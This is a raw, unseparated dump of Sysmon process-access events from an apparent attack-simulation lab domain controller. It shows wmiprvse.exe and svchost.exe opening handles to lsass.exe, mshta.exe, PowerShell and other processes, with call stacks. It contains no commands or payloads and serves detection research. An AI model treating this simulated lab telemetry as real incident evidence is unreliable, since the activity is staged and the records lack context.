16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030812Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030811Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030810Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030809Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030808Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030807Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030806Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030805Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030804Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030803Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.973{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030802Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.801{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030801Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.801{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030800Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CC-6008-F506-00000000A301}6084C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030799Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CC-6008-F406-00000000A301}4400C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030798Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F306-00000000A301}7828C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030797Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030796Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030795Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030794Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030793Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030792Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 